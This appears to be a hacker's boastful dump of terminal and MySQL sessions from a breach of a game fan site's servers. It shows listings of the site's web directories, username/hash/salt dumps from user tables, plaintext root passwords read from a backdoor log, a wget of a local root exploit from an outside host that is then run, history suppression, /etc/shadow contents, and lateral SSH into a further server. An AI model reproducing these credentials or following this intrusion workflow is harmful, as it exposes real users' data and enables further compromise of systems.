-rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html
drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common
drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc
drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira
drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404
-rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico
drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus
-rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html
drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img
-rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html
-rw-r--r-- 1 root root 14553577 Oct 11 07:51 phpbb_users.txt
-rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php
-rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt
-rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old
drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc
drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape
drwxr-xr-x 9 root root 4096 Sep 24 2007 silks
-rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg
-rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml
-rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml
drwxr-xr-x 2 root root 4096 Mar 28 2005 stats
-rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg
drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage
drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela
-rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana
drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini
drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard
-rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html
drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes
-rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip
[root@web01 html]# cd adds
[root@web01 adds]# ls -al
total 208
drwxrwxr-x 13 root apache 4096 Sep 24 16:25 .
drwxr-xr-x 20 root root 4096 Oct 11 07:45 ..
-rw-rw-r-- 1 root apache 2308 Apr 29 2006 activation.old.php
-rw-rw-r-- 1 peter peter 2846 Sep 14 2008 activation.php
drwxrwxr-x 2 root apache 4096 Apr 17 21:03 areas
drwxrwxr-x 2 root apache 4096 Jun 15 2008 backup
-rw-rw-r-- 1 root apache 580 Apr 25 2006 backup.php
-rw-rw-r-- 1 root apache 1002 Jan 4 2007 comparereqs.php
-rw-rw-r-- 1 peter peter 15124 Jul 21 2008 contactsubmits.php
-rw-rw-r-- 1 peter peter 473 Jul 21 2008 contactuspopup.php
-rw-rw-r-- 1 peter peter 961 Jul 23 2008 download.php
drwxrwxrwx 6 root apache 4096 Dec 20 2009 files
drwxrwxr-x 3 root apache 4096 Oct 3 2010 functions
drwxrwxr-x 2 root apache 4096 Jun 15 2008 handlers
-rw-rw-r-- 1 peter peter 421 Sep 14 2008 hosttest.php
drwxrwxr-x 2 root apache 4096 Sep 14 2008 includes
-rw-rw-r-- 1 root apache 25247 May 20 14:34 index.php
-rw-rw-r-- 1 root apache 130 Sep 24 16:50 info.php
-rw-rw-r-- 1 peter peter 12110 Jun 12 14:59 itempopup_search.php
drwxrwxr-x 4 peter peter 4096 Jun 12 14:58 js
-rw-rw-r-- 1 root apache 397 Apr 25 2006 keepalive.php
-rw-rw-r-- 1 root apache 4454 Apr 28 2006 login.old.php
-rw-rw-r-- 1 peter peter 10348 Jan 26 2011 login.php
drwxrwxr-x 8 root apache 4096 Jun 15 2008 map_team
-rw-rw-r-- 1 root apache 2270 May 30 2006 previewtimes.php
drwxrwxr-x 5 root apache 4096 Apr 2 2011 styles
drwxrwxr-x 2 root apache 4096 Jun 15 2008 tmp
drwxrwxr-x 2 root apache 4096 Sep 24 16:50 transfer
-rw-rw-r-- 1 root apache 533 Apr 25 2006 userguide_coders.php
-rw-rw-r-- 1 root apache 28370 Jul 16 2009 userguide.php
-rw-rw-r-- 1 root apache 4889 Apr 25 2006 userguidepopup.php
[root@web01 adds]# head -n010 login.php
*------------------------------------------------------------------------------
*/
session_start();
[root@web01 adds]# head -n100 login.php
*------------------------------------------------------------------------------
*/
session_start();
//include stuff
include('functions/db_connect_guides.php');
require_once('functions/admin.php');
ini_set('error_reporting', E_ALL);
function prepareinput($array)
{
foreach($array as $key => $value)
{
if (!is_array($array[$key]))
{
$value = stripslashes($value);
$value = mysql_real_escape_string($value);
$array[$key] = $value;
}
}
return $array;
}
prepareinput($_POST);
function login($msg, $disable, $user)
{
$disabled = '';
if($disable == 'true')
{
$disabled = ' disabled';
}
print '
Restricted Area :: '.$msg.'
';
}
if(!isset($_SESSION['count']))
{
$_SESSION['count'] = 0;
}
if ($_SESSION['count'] > 3)
{
login('Too many incorrect logins', 'true');
exit();
}
if(isset($_GET['logout']))
{
if(isset($_COOKIE['session_info']) || isset($_COOKIE['session_info_id']))
{
setcookie("session_info", "", time()-60*60*24*100, "/");
setcookie("session_info_id", "", time()-60*60*24*100, "/");
}
if(isset($_SESSION['session_info']))
{
[root@web01 adds]# cat functions/db_connect_guides.php
[root@web01 adds]# cd ..
[root@web01 html]# ls -al
total 716824
drwxr-xr-x 20 root root 4096 Oct 11 07:45 .
drwxr-xr-x 21 root root 4096 Jun 28 09:06 ..
drwxrwxr-x 13 root apache 4096 Oct 11 07:53 adds
-rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal2.html
-rw-r--r-- 1 root root 14427 Aug 31 2007 cal.html
drwxr-xr-x 3 eira eira 4096 Jan 16 2007 common
drwxr-xr-x 3 eira eira 4096 Feb 8 2005 daoc
drwxr-xr-x 4 eira eira 4096 Jul 10 2008 eira
drwxr-xr-x 7 eira eira 4096 Aug 19 2008 error_404
-rw-r--r-- 1 eira eira 2274 Dec 21 2003 favicon.ico
drwxr-xr-x 3 root root 4096 Aug 20 2008 gladiatus
-rw-r--r-- 1 root root 0 Dec 25 2006 google13ce76cda5634bd5.html
drwxr-xr-x 4 eira eira 4096 Jan 30 2006 img
-rw-rw-r-- 1 eira eira 1507 Jun 22 2004 index.html
-rw-r--r-- 1 root root 20509161 Oct 11 07:54 phpbb_users.txt
-rw-r--r-- 1 root root 16 Mar 25 2005 phpinfo_x.php
-rw-r--r-- 1 root root 0 Sep 21 2007 robots.txt
-rw-r--r-- 1 root root 1548 Jan 16 2007 robots.txt-old
drwxrwxr-x 13 eira apache 4096 Oct 3 2010 rsc
drwxrwxr-x 31 eira apache 4096 Oct 7 00:59 runescape
drwxr-xr-x 9 root root 4096 Sep 24 2007 silks
-rw-rw-r-- 1 eira eira 15698 Dec 20 2003 Silverion.jpg
-rw-r--r-- 1 root root 141686 Jun 6 2007 sitemap2.xml
-rw-r--r-- 1 root root 15276 Jun 6 2007 sitemap.xml
drwxr-xr-x 2 root root 4096 Mar 28 2005 stats
-rw-rw-r-- 1 eira eira 34462 Jun 22 2004 tipitlayout1c.jpg
drwxr-xr-x 2 webalizer root 4096 Jul 1 2005 usage
drwxr-xr-x 5 eira eira 4096 Sep 26 06:27 vela
-rw-r--r-- 1 root root 114052870 Jun 24 01:41 vela.tar.gz
drwxr-xr-x 3 eira eira 4096 Aug 9 2007 vocegiuliana
drwxr-xr-x 2 eira eira 4096 Aug 9 2007 volantini
drwxr-xr-x 3 eira eira 4096 Jun 9 2008 wizard
-rw-r--r-- 1 root root 127 Jan 15 2007 y_key_56098cca870c821d.html
drwxr-xr-x 2 root root 4096 Jun 24 09:34 zenit
drwxr-xr-x 10 eira eira 4096 Jun 24 01:08 zenit-with-holes
-rw-r--r-- 1 root root 598370689 Jun 24 01:44 zenit.zip
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| lotro |
| runescape |
| war |
+--------------------+
4 rows in set (0.00 sec)
mysql> show tables;
+---------------------------+
| Tables_in_runescape |
+---------------------------+
| adds_approvals |
| adds_auth |
| adds_categories |
| adds_images |
| adds_ip |
| adds_log |
| adds_sessions |
| adds_uploads |
| adds_users |
| members |
| rs2_atlas |
| rs2_calculators |
| rs2_calculators_arrays |
| rs2_citadel |
| rs2_citadel_slot |
| rs2_clanlist |
| rs2_clans_news |
| rs2_clans_pages |
| rs2_construction |
| rs2_contactus |
| rs2_diversion_locations |
| rs2_diversion_pair |
| rs2_diversion_week |
| rs2_dynamic_approve |
| rs2_dynamic_bans |
| rs2_dynamic_log |
| rs2_dynamic_statcache |
| rs2_events |
| rs2_events_comments |
| rs2_events_scores |
| rs2_events_scores_players |
| rs2_events_scores_year |
| rs2_events_teams |
| rs2_featured |
| rs2_gecache |
| rs2_genames |
| rs2_gerecords |
| rs2_getimes |
| rs2_guides |
| rs2_hitscheck |
| rs2_microhelper |
| rs2_monster |
| rs2_monster_attacks |
| rs2_monster_groups |
| rs2_monster_items |
| rs2_monster_reports |
| rs2_news |
| rs2_pages |
| rs2_poll |
| rs2_poll2 |
| rs2_poll2_answers |
| rs2_poll2_votes |
| rs2_poll_results |
| rs2_poll_votes |
| rs2_quest |
| rs2_quest_draft |
| rs2_quest_pages |
| rs2_quest_reports |
| rs2_quest_req |
| rs2_races |
| rs2_report_ban |
| rs2_report_flood |
| rs2_subquests |
| rs2_summon |
| rs2_times |
| rs2_times_dategroups |
| rs2item |
| rs2item_categories |
| rs2item_group_items |
| rs2item_groups |
| rs2item_reports |
| rs2item_stats |
| rs2item_subcat |
| rs2shops |
| rs2shops_city |
| rs2shops_currency |
| rs2shops_kingdom |
| rs2shops_report |
| rs2shops_reportstock |
| rs2shops_stock |
| rs2shops_type |
| rsc_bestiary |
| staff_position |
| staff_users |
+---------------------------+
84 rows in set (0.00 sec)
mysql> select concat_ws(0x3a,user_name,password,salt) from adds_users;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 11415326
Current database: runescape
+----------------------------------------------------------+
| concat_ws(0x3a,user_name,password,salt) |
+----------------------------------------------------------+
| Silverion:reset:1f8a04f00 |
| SerpentEye:17da56625f34972c22f117899a5d0b15:7505d9618 |
| pokemama:88d5ef7cb02d4505d4f8e65ec597fbd6:a2d14e70e |
| Neminon:e471395f84f7a7a35d246f9f7160ad72: |
| boomer12342:f29f9860bda0f8b859dd23268ecc7297:8dfcee96f |
| Vhellcat:c701886bf870bcdc805f76b5fd374dc7:08bf200db |
| TecMaster532:cd06d27dd29ccbd6e07696da9c60b723:3cfea708e |
| tripsis:61e375455c3098a8eb025509b0c01ce2:a6540538c |
| Siobhana:9cba134889178fab200681778ed64bc7:07aa5e9a6 |
| Cowman_Alt:64e77b28db2690a3f634f2b0bf6cfcd4:a5f45f4ff |
| Jafje:ff34beeb4b3ca02f56c0220f55cff497:d877c37b1 |
| BloodAngel:d98a9d8f98897615a6d9d7564e5ff96a:270972c7e |
| Speedyshel:f84faf4a6559b31970a5a9011d23834a:cc18e9930 |
| Octarine19:7c36cce68f9638084e1a9e59bcc35049:bd4fbd2b5 |
| ForsakenMage:ada76cc2ab885d5f7279e80922d7a71d:e45a31d57 |
| RussetAlpha:b487ad58bbf037f95e71233e715a5dad:53a7ec27a |
| Cruiser:a5dfbc4b586c7c4cafa22f2ad0ee5b96:1d553218b |
| odd:f8ff8c31ba125143553ec938e5b12d20:61ca14d4a |
| Peter:951089f4243b3d8a6f3594c93044e760:3e53bd8f5 |
| Howlin0001:68330b7b8312607a2bfe8c9c19871b91:35dea8edb |
| Cowman_133:299aaa335c3a495bbf3d1cafd058f5cd:9675427ce |
| Wyvren2000:705388e025c0a735fc1da8db7e712c2b:6c073222b |
| Omnitec:reset:3ec004ab3 |
| Neglexis:2ebad4e50ce6f35a8475dbee4e56eb96:e38cd9ef9 |
| All Bogs:9654c5c25c0c8ef1a388a72752838789:7a8173c33 |
| SupaDavis:ef62d3d94a47a37b7da6fddc57f8ad8c:b709c0781 |
| Warriormonkx:8a062a10beaba882dcd3df5e8c7bee02:dcf7f7c69 |
| Y_Guy:7acbe93c2fe874ce0ed3ae41e08f3459:4a223174a |
| Wisse:a193694d7c0b81fef013981c9b4e6f28:ef42c869d |
| Quyneax:bac515af1da4bfaaad2784252d486437:072df5de1 |
| Georgelemmons:a62aa37c706d7b771248c482a5967f1d:0ddb6568e |
| Racheya:016ae44475e45249916f8b95dd86d01c:2f88b1ecb |
| thiesje:cdcfdc5b16348885ea7463faf28b9bf5:8c6fa1bd7 |
| Rien_Adelric:0d8151822c4c0969a0055301c162221b:8fd0c8e29 |
| Mil:e7a650a25af5937e73c7f49a229a6f6b:51fde375f |
| Xena_Dragon:934151f9705764bf2210525929df0d71:b3cc89564 |
| Salleh:2ea800dd6342b4c5c1b0c8feaed1d9b9:ba42b9413 |
| Dudecrush8:9a97271a9fbc5cdc946f92baa8ee34e8:6cb5adb7e |
| Shelby_Polo:2f58410c5ed973d69b4ba033616788ba:426bc7a2c |
| Rainy_Day:303096af8ea595fd0107324785ab25b8:b2dc94661 |
| Aurhora:9592eda4def55c8039a05b5ed3c774f9:66cdecae4 |
| qloque:846239db337c953829c787f0942c170e:254287237 |
| RobocopIsWin:e4866132c88592ece4ac96ef18df5aa9:346f55d94 |
| Alaz:538c7ae1ad111f526333891211e1a4c0:8d22758d6 |
| Woofumz:63472704bdf216b612a2da024726958a:af48fb8b4 |
| jimmy_jim:reset:415d8a35d |
| Evaluate:a95f91b0f1aa28dd4407885c6ed41bf1:9f3e31d31 |
+----------------------------------------------------------+
And now...just for lulz, we sniffed da root passwordz
[root@web01 bulat]# cat /root/.bdlogs
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: root:WBSCt92b
login in: beta:xUFru6ra5raF
login in: beta:xUFru6ra5raF
login in: root:WBSCt92b
login in: root:WBSCt92b
login at: 208.43.229.199 bulat:
login at: 208.43.229.199 bulat:
^That makes one box, NOW FOR DA NEXT!@#$#$%^&&**((@(@(@))))@)@)@)@)#)#)#)#)#)#)##)#)#)#)#)#)#)#)#)#0
[bulat@forumx ~]$
[bulat@forumx ~]$ wget niqqaz.rs/0dayhidden -O tr1p >> /dev/null
[bulat@forumx ~]$ ./tr1p
Enter b1tch key: ***************
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff81062417
[+] Resolved prepare_kernel_cred to ffffffff810622f8
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@forumx ~]# export HISTFILE=/dev/null
[root@forumx ~]# uname -a; id
Linux forumx.tip.it 2.6.30.10-105.2.23.fc11.x86_64 #1 SMP Thu Feb 11 07:06:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@forumx ~]# last -a |less
root tty1 Tue Oct 11 07:42 gone - no logout
reboot system boot Tue Oct 11 07:23 (00:45) 2.6.30.10-105.2.23.fc11.x86_64
peter pts/0 Tue Oct 11 05:23 - down (01:56) stu8fa4.kent.ac.uk
reboot system boot Mon Oct 10 09:42 (21:37) 2.6.30.10-105.2.23.fc11.x86_64
peter pts/1 Sun Oct 9 18:57 - 19:21 (00:24) stu8fa4.kent.ac.uk
root pts/1 Mon Oct 3 10:38 - 11:27 (00:48) 188-230-152-15.dynamic.t-2.net
peter pts/2 Sun Oct 2 08:04 - 09:15 (01:11) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root pts/1 Sun Oct 2 08:04 - 00:46 (16:42) 188-230-152-15.dynamic.t-2.net
root pts/1 Fri Sep 30 01:24 - 08:24 (06:59) bsn-176-196-23.dial-up.dsl.siol.net
peter pts/1 Thu Sep 29 07:29 - 08:53 (01:23) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
root pts/1 Tue Sep 27 02:23 - 04:31 (02:07) 188-230-152-15.dynamic.t-2.net
root pts/2 Mon Sep 26 15:07 - 22:06 (06:59) 188-230-152-15.dynamic.t-2.net
peter pts/1 Mon Sep 26 14:27 - 16:33 (02:05) cpc4-hart9-2-0-cust61.11-3.cable.virginmedia.com
[root@forumx ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:499:498:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
backuppc:x:497:496::/var/lib/BackupPC:/usr/bin/nologin
torrent:x:496:495:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
lighttpd:x:495:490:lighttpd web server:/var/www/lighttpd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi-autoipd:x:494:489:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
peter:x:501:48::/home/peter:/bin/bash
teamspeak:x:502:502::/home/teamspeak:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
unbound:x:493:488:Unbound DNS resolver:/etc/unbound:/sbin/nologin
pulse:x:492:487:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sphinx:x:491:484:Sphinx Search:/var/lib/sphinx:/bin/bash
clamav:x:490:483:Clamav database update user:/var/lib/clamav:/sbin/nologin
[root@forumx ~]# cat /etc/shadow
root:$1$YrhwGJ9V$KQHuSZO40Bp0svjl/KxoY0:15258:0:99999:7:::
bin:*:14115:0:99999:7:::
daemon:*:14115:0:99999:7:::
adm:*:14115:0:99999:7:::
lp:*:14115:0:99999:7:::
sync:*:14115:0:99999:7:::
shutdown:*:14115:0:99999:7:::
halt:*:14115:0:99999:7:::
mail:*:14115:0:99999:7:::
news:*:14115:0:99999:7:::
uucp:*:14115:0:99999:7:::
operator:*:14115:0:99999:7:::
games:*:14115:0:99999:7:::
gopher:*:14115:0:99999:7:::
ftp:*:14115:0:99999:7:::
nobody:*:14115:0:99999:7:::
nscd:!!:14115:0:99999:7:::
vcsa:!!:14115:0:99999:7:::
distcache:!!:14115:0:99999:7:::
tcpdump:!!:14115:0:99999:7:::
rpm:!!:14115:0:99999:7:::
ntp:!!:14115:0:99999:7:::
squid:!!:14115:0:99999:7:::
dbus:!!:14115:0:99999:7:::
polkituser:!!:14115:0:99999:7:::
apache:!!:14115:0:99999:7:::
avahi:!!:14115:0:99999:7:::
openvpn:!!:14115:0:99999:7:::
named:!!:14115:0:99999:7:::
rpcuser:!!:14115:0:99999:7:::
nfsnobody:!!:14115:0:99999:7:::
mailnull:!!:14115:0:99999:7:::
smmsp:!!:14115:0:99999:7:::
sshd:!!:14115:0:99999:7:::
webalizer:!!:14115:0:99999:7:::
dovecot:!!:14115:0:99999:7:::
backuppc:!!:14115:0:99999:7:::
torrent:!!:14115:0:99999:7:::
haldaemon:!!:14115:0:99999:7:::
mysql:!!:14116::::::
xfs:!!:14119::::::
bulat:$1$ZgjnuDTq$zwXg5PW4oa5ZK5ETOyIMp0:14119:0:99999:7:::
lighttpd:!!:14142::::::
postfix:!!:14142::::::
avahi-autoipd:!!:14154::::::
peter:$1$8DGBPy.f$57BMYWsBl4VyMnwnJqKKV0:15196:0:99999:7:::
teamspeak:$1$yb1s1A.E$KrNgLaB9qTZvI5Sv8kgnr/:14230:0:99999:7:::
rpc:!!:14722:0:99999:7:::
oprofile:!!:14722::::::
unbound:!!:14817::::::
pulse:!!:14817::::::
sphinx:!!:14817::::::
clamav:!!:15149::::::
[root@forumx html]# ls -al
total 36
drwxr-xr-x. 5 root root 4096 2010-08-18 15:20 .
drwxr-xr-x. 9 root root 4096 2010-04-06 17:31 ..
drwxr-xr-x 15 peter apache 4096 2011-10-11 06:07 forum.tip.it
-rw-r--r-- 1 root root 202 2008-07-12 20:50 index.html
-rw-r--r-- 1 root root 746 2008-06-05 13:51 index.html.bak
drwxr-xr-x 11 root root 4096 2008-06-14 10:39 lotro.tip.it
drwxrwxrwx 12 root root 4096 2008-06-14 10:39 nosf.tip.it
[root@forumx html]# cd forum.tip.it
[root@forumx forum.tip.it]# cat conf_global.php
Some more lulz-
mysql> select concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) from members limit 0,100;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 8246
Current database: forum2009
+-----------------------------------------------------------------------------------+
| concat_ws(0x3a,members_l_username,members_pass_hash,members_pass_salt,email_full) |
+-----------------------------------------------------------------------------------+
| ipstech:811743d8d526fc93ebccc21868b5dc01:p2juR:0 |
| raenond:a51db4af185443c9eda7959bbc1db46b:|Xx@^ |
| newptor:7dbe3455cbe75ccaf323f0fdc60c343c::1 |
| forsakenmage:b16c211fd7ece57d27a26a6b3af2dc6f::0 |
| ma6bi0ahk:5da6d54b3a62471dca4b9149fffea480:2RfQJ |
| grornemow:e8ae9223c7e9d10732696e944f170339:r&rxP |
| stephenpope95:de999ecfb8bd7a324a21c14c17eafc40:y>;{N |
| snowstorm:a4d4a28ac7555cc63dabf97a4a6bf859:&#}7C |
| pyro:: |
| greatsilverwyrm:ec3cce8f7202359d5736747033764d31: |
| tsai:: |
| ladysarafina:: |
| lightning:816480113af7100424d2f25a362c559d:bU^Oi |
| exarch:: |
| mage_burner:f79b3d203951b862c4b8b6da4abfcac2:O#8ZG |
| ks_jeppe:: |
| sunli:c49b237e7c06fc7dcb9f74e535329289::0 |
| eeeeediot:623289da6a24f789119314ea84468a5c:y*+y1 |
| nathaninch:c9768daf5bf630888a1b8089467ccfdc::0 |
| fat_slug:a6c56934e826c1a4e024e7fb8792a2fc:?o70?:0 |
| swamp_cat:: |
| deadman_andy:: |
| spencerm98:: |
| tomato:8efa60748b553eef472ae9f2c18c559a: |
| swifty_mcvae:: |
| the_sith:41cbdb3a5812fbb4bbea15fdbe860783: |
| misplacedme:5ccd22ceef73abf706205231926b99ad:idmSP:0 |
| red_tanya:481b5be84b6fdf41209287e5b4ecbd9f:>7kSW:0 |
| ryl:: |
| meesy:: |
| grin_king:: |
| runegirlie:725f06fee6d8ae7a16907dba70f7970a: |
| wistan:: |
| weezcake:6dbc57cc53dfd9a55169d2a3e45cf2df: |
| dusqi:853606dbc6d91e2d9c3150d18c7d3d7b: |
| silverion:86038e207109d75b5d4ca3fed3f77515:N!}v;:0 |
| troydosdos:26adab7d89084975f19f4726feba94df:Lg4/O |
| leon_art:8401deaafc1e650873141fb288148e8c:Zyauw |
| wmathewphelpsr:0c7f31c983ff159a2df84f8b18653099:.SvI} |
| thunder:: |
| bobdabuilda:: |
| sunspeak:15da5ede7bd58b954d20ff3fa5a8c00e:M*T;` |
| rease:5a23d8c8d72eb409b676224e478c3fc8:h.UBm |
| militaris:109bff6a3dd1ca020dfa8403a156c709:44.%z |
| cameron:: |
| swtkittn:dbd1975e4055c1cd36e0e1acae1928c8: |
| centuramage:: |
| zidanect:3ea3599bff9d19a9fea14a750d82555a::0 |
| chicken:: |
| insane:34aa5866c803ab64fc2b43ff7897a402: |
| dromaruk:: |
| usara:72fc5241b75e9ee7a1dabd793cebf3fd:z|Ybh |
| gumby:: |
| herr:: |
| lageris89:: |
| mideea:: |
| cruiser:59fec7c72e4b9b14446101618d06cb10: |
| leylen:577fa11e45922b41b2e67c373b1a9047: |
| rpg_pro:62de274e1926c5640fed496626d3cf81:R/Un# |
| sidewinder:: |
| tomiz:: |
| punk4ever:: |
| jammy316:: |
| sandytrain:: |
| netbent:: |
| cellkiller20:11d74d43fbca17192a3b18cb56c0ea66:[zEE' |
| craven_image:1f99956e517d2bdb9edd2ab95ba1d666:u(-LT |
| emp:: |
| lord9000:: |
| kylepetty:: |
| smoressoccer:a01d93f665bf6cb96dd7c2a907a08f42: |
| paul:: |
| mystical25:: |
| phunk:: |
| andrew:: |
| the_pure12:: |
| 2cansamyboy:: |
| pepsi16:: |
| godofend:: |
| coolhaz7000:: |
| bluetear:2b3ffba93ff4ff5bf913d3cd32dc1a8d: |
| phil:18d40b67a951ffd2111600af162e4204: |
| sneakydiva:: |
| xxxxthugxxxx:: |
| lord:: |
| annie:: |
| pker_dude_jr:49362d81bd5318dacf86ea4f0477f9f1: |
| juha_itse:: |
| matt:: |
| nik:: |
| blue107:a5085415200c7ef8da98b59e4834b819: |
| greenminer:1d9704bfc517f297a06e2cb62102a3cb: |
| ex1le:: |
| gathra:526a36f262203f006b73913bdec4ef1f:|jJIm |
| moridin:599e4766740f874be5076cca7b9215d8:ybg`l |
| _kinslayer_:: |
| psycho:: |
| ultrasmasher:f7e0a2681c4f46f649ff00e37d3d14dd: |
| sin_q:: |
| anonimouse69:: |
+-----------------------------------------------------------------------------------+
100 rows in set (0.13 sec)
--NEXT BOX
[root@forumx bulat]# ssh gaspez-arts.com -lroot
The authenticity of host 'gaspez-arts.com (66.36.248.197)' can't be established.
RSA key fingerprint is 58:7c:8e:2b:1c:80:41:ad:15:65:98:72:31:3a:48:8e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'gaspez-arts.com,66.36.248.197' (RSA) to the list of known hosts.
root@gaspez-arts.com's password:
Last login: Fri Sep 30 13:33:04 2011 from 188-230-152-15.dynamic.t-2.net
[root@mail ~]# uname -a;id
Linux mail.tip.it 2.6.23.17-88.fc7 #1 SMP Thu May 15 00:35:10 EDT 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@mail arena_test]# last -a
eira pts/0 Mon Oct 10 04:53 - 07:06 (02:12) 95.233.233.42
eira pts/0 Sat Oct 8 01:22 - 03:37 (02:14) host17-203-dynamic.58-82-r.retail.telecomitalia.it
eira pts/1 Thu Oct 6 03:26 - 05:43 (02:17) host46-171-dynamic.56-82-r.retail.telecomitalia.it
[root@mail eira]# cat .bash_history | tail
ls -al
exit
cd /etc/httpd/conf.d
ls -al
su
cd /etc/httpd/conf.d
su
w
cd /etc/httpd/conf.d
su
[root@mail ~]# ls -la /var/www
total 16656
drwxr-xr-x 36 root root 4096 2011-06-23 02:56 .
drwxr-xr-x 25 root root 4096 2007-10-19 10:20 ..
drwxr-xr-x 12 eira eira 4096 2008-08-31 11:00 arena
drwxr-xr-x 10 eira eira 4096 2006-10-27 05:01 arena_old
drwxr-xr-x 5 eira eira 4096 2011-08-01 07:29 arredareinsieme
drwxr-xr-x 17 eira eira 4096 2009-11-30 18:16 asquinimobili
drwxr-xr-x 3 eira eira 4096 2010-07-06 11:23 atc
drwxr-xr-x 11 eira eira 4096 2010-03-29 16:07 cetekor
drwxr-xr-x 2 eira eira 4096 2010-03-19 11:40 cetekor_mom
drwxr-xr-x 2 root root 4096 2008-01-24 10:45 cgi-bin
drwxr-xr-x 7 eira eira 4096 2011-06-13 10:10 common
drwxr-xr-x 9 eira eira 4096 2009-03-29 07:01 control_panel
